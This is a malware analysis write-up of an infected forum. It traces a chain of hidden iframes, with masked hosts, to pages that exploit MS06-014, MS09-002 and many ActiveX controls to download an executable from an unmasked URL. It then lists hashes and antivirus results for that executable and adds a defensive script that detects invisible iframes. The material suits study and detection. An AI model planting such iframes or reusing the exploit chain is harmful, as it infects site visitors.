A forum was found infected with Worm.Win32.AutoRun.eyh.
The forum page contains the following code:
/---
<IFRAME width='0' Height='0' src='hxxp://www.5**4*z**c.cn/1*%7aq/q.js'></iframe>
---/
hxxp://www.5**4*z**c.cn/1*%7aq/q.js
This script writes out:
/---
<IFRAME src="hxxp://M**.SF*S3**wws.cn/03/x4.htm" width=1 Height=0></iframe>
---/
hxxp://M**.SF*S3**wws.cn/03/x4.htm
This page in turn includes:
/---
<IFRAME src=google.htm width=100 Height=0></iframe>
---/
hxxp://M**.SF*S3**wws.cn/03/google.htm
This page uses a previously unseen obfuscation method. The code begins with:
/---
<HTML>
---/
Its job is to detect the browser: if it is Internet Explorer, ie.swf is served, otherwise ff.swf. It then writes out:
/---
<IFRAME src=all.htm width=100 Height=0></iframe>
---/
hxxp://M**.SF*S3**wws.cn/03/all.htm
all.htm uses the same obfuscation method.
It uses <IFRAME> to load the following pages, each of which exploits a vulnerability to download hxxp://d1.csygg.com/01/g.exe:
1.htm: exploits MS06-014
kdosn.htm: exploits the QvodPlayer vulnerability (CLSID: F3D0D36F-23F8-4682-A195-74C92B03D4AF)
kc.htm: exploits the Baidu Toolbar vulnerability (CLSID: {A7F05EE4-0426-454F-8013-C41E3596E9E9}) to download hxxp://d1.csygg.com/01/baidu.cab
newlz.htm: exploits the Xunlei Thunder vulnerability (GLIEDown.IEDown.1, CLSID: F917534D-535B-416B-8E8F-0C04756C31A8)
s.htm: exploits the Sina vulnerability (Downloader.DLoader.1, CLSID: 78abdc59-d8e7-44d3-9a76-9a0918c52b4a)
office.htm: exploits the MS Office vulnerability (snpvw.Snapshot Viewer Control.1)
bf.htm: exploits the Baofeng Storm media player vulnerability (MPS.StormPlayer)
cx.htm: exploits the SuperStar Reader (SSReader) vulnerability (Pdg2)
uu.htm: exploits the UUSee network TV vulnerability (UUUpgrade.UUUpgradeCtrl.1)
2.htm: exploits the HanGamePluginCn18.HanGamePluginCn18.1 vulnerability
3.htm
4.htm: exploits the RealPlayer vulnerability (IERPCtl.IERPCtl.1)
0.htm: exploits the vulnerability in the control with CLSID: 19effc12-25fb-479a-a0f2-1569ae1b3365
5.htm: exploits MS09-002
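A defender-side check for the hidden-iframe injection described above, written as an added example (not code from the write-up): it parses HTML with Python's standard html.parser and reports every iframe sized to be invisible (width or height of 0 or 1 pixel), which matches all three frames in this chain. The sample markup is constructed to mirror the injected tags, with the hosts kept masked exactly as the write-up shows them.

```python
from html.parser import HTMLParser

# Iframes whose width or height is 0 or 1 pixel are invisible to the visitor; the
# injected chain on this forum used exactly such frames (0x0, 1x0 and 100x0).
HIDDEN_MAX_PX = 1

def _px(value):
    """Parse a width/height attribute such as '0', '100' or '100px'; None if unparsable."""
    if value is None:
        return None
    digits = "".join(ch for ch in value.strip().strip("'\"") if ch.isdigit())
    return int(digits) if digits else None

class HiddenIframeFinder(HTMLParser):
    """Collect iframe tags that are sized so the user cannot see them."""
    def __init__(self):
        super().__init__()
        self.hits = []  # list of (src, width, height)

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so <IFRAME ... Height=0> matches too
        if tag != "iframe":
            return
        a = {k.lower(): v for k, v in attrs}
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= HIDDEN_MAX_PX) or (h is not None and h <= HIDDEN_MAX_PX):
            self.hits.append((a.get("src", ""), w, h))

def find_hidden_iframes(html):
    """Return [(src, width, height), ...] for every invisible iframe in the document."""
    p = HiddenIframeFinder()
    p.feed(html)
    p.close()
    return p.hits

# Constructed sample modelled on the injected markup from the forum page; the
# masked hosts and hxxp scheme are copied from the write-up, the rest is filler.
SAMPLE = """
<html><body>Welcome to the forum
<IFRAME width='0' Height='0' src='hxxp://www.5**4*z**c.cn/1*%7aq/q.js'></iframe>
<IFRAME src="hxxp://M**.SF*S3**wws.cn/03/x4.htm" width=1 Height=0></iframe>
<IFRAME src=google.htm width=100 Height=0></iframe>
<iframe src="video.htm" width="640" height="480"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, w, h in find_hidden_iframes(SAMPLE):
        print(f"hidden iframe {w}x{h}: {src}")
```

Run it over saved copies of the forum's pages; the visible 640x480 frame is ignored and only the three injected ones are reported.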
File description: D:/test/g.exe
Attributes: ---
Digital signature: no
PE file: yes
An error occurred while obtaining the file version information!
Creation time: 22:38:20
Modification time: 22:38:20
Size: 25696 bytes, 25.96 KB
MD5: cae3e537b9d4495d31af6c360cb31dee
SHA1: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
CRC32: 3ee9304b
Anti-virus engine | Version | Last update | Scan result
A-squared | 4.0.0.101 | 2009.03.23 | Win32.Warezov!IK
AhnLab-V3 | 5.0.0.2 | 2009.03.23 | Packed/Upack
AntiVir | 7.9.0.120 | 2009.03.23 | TR/Crypt.UPKM.Gen
Authentium | 5.1.2.4 | 2009.03.23 | W32/Systroj.N.gen!Eldorado
Avast | 4.8.1335.0 | 2009.03.23 | -
AVG | 8.5.0.283 | 2009.03.23 | Rootkit-Agent.BN
BitDefender | 7.2 | 2009.03.23 | Generic.Malware.SP!BPK!TKG.be60b47d
CAT-QuickHeal | 10.00 | 2009.03.23 | -
ClamAV | 0.94.1 | 2009.03.23 | Worm.Mytob-73
Comodo | 1082 | 2009.03.23 | -
DrWeb | 4.44.0.09170 | 2009.03.23 | DLOADER.Trojan
eSafe | 7.0.20. | 2009.03.23 | Win32.Looked.gen
eTrust-Vet | 31.6.6412 | 2009.03.23 | -
F-Prot | 4.4.4.56 | 2009.03.23 | W32/Systroj.N.gen!Eldorado
F-Secure | 8.0.14470.0 | 2009.03.23 | Trojan.Win32.Agent2.gcy
Fortinet | 3.117.0.0 | 2009.03.23 | -
GData | 19 | 2009.03.23 | Generic.Malware.SP!BPK!TKG.be60b47d
Ikarus | T3.1.1.48.0 | 2009.03.23 | Win32.Warezov
K7AntiVirus | 7.10.678 | 2009.03.21 | Generic.Packed.Upack-1
Kaspersky | 7.0.0.125 | 2009.03.23 | Trojan.Win32.Agent2.gcy
McAfee | 5561 | 2009.03.22 | -
McAfee+Artemis | 5561 | 2009.03.22 | New Malware.f
McAfee-GW-Edition | 6.7.6 | 2009.03.23 | Trojan.Crypt.UPKM.Gen
Microsoft | 1.4502 | 2009.03.23 | -
NOD32 | 3953 | 2009.03.21 | -
Norman | 6.00.06 | 2009.03.23 | W32/Suspicious_U.gen
nProtect | 2009.1.8.0 | 2009.03.23 | -
Panda | 10.0.0.10 | 2009.03.22 | -
PCTools | 4.4.2.0 | 2009.03.23 | Packed/Upack
Prevx1 | V2 | 2009.03.23 | High Risk Worm
Rising | 21.22.02.00 | 2009.03.23 | Worm.Win32.AutoRun.eyh
Sophos | 4.39.0 | 2009.03.23 | Mal/Packer
Sunbelt | 3.2.1858.2 | 2009.03.22 | -
Symantec | 1.4.4.12 | 2009.03.23 | Trojan.KillAV
TheHacker | 6.3.3.4.287 | 2009.03.23 | -
TrendMicro | 8.700.0.1004 | 2009.03.23 | Cryp_Upack
VBA32 | 3.12.10.1 | 2009.03.23 | -
ViRobot | 2009.3.23.1660 | 2009.03.23 | -
VirusBuster | 4.6.5.0 | 2009.03.22 | Packed/Upack
Additional information
File size: 25696 bytes
MD5: cae3e537b9d4495d31af6c360cb31dee
SHA1: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
SHA256: sha256
SHA512: e49b97f98091ab44e4e89152db963aba30fa671238d735efca54259bb970550 (truncated)
ssdeep: 384:b5jocon1ffccinu9mg1_hy+qvmf6mfjt6unhqjnx8cw02igc8telalvr7l:B4co7ykjvxfjc7n2igptelavr
PEiD: Upack 0.24-0.27 beta / 0.28 alpha -> Dwing
TrID: file type identification: DOS Executable Generic (100.0%)
PEInfo: PE structure information
(base data)
entrypointaddress: 0x1efe3
timedatestamp: 0x0 (Thu Jan 01 00:00:00 1970)
machinetype: 0x14c (i386)
(2 sections)
name | viradd | virsiz | rawdsiz | ntrpy | MD5
.Upack | 0x1000 | 0x18000 | 0x0 | 0.00 | d41d8cd98f00b204e9800998ecf8427e
.rsrc | 0x19000 | 0xe000 | 0x6260 | 7.98 | 88e69c0ef43413739c008ef9e7337308
(1 imports)
> kernel32.dll: LoadLibraryA, GetProcAddress
(0 exports)
Prevx info: http://info.prevx.com/aboutprogramtext.asp?px5=2480bffb6039ec60640200dbb987a400c935bb45
Packers (Kaspersky): UPack
Packers (Authentium): embedded
Packers (F-Prot): embedded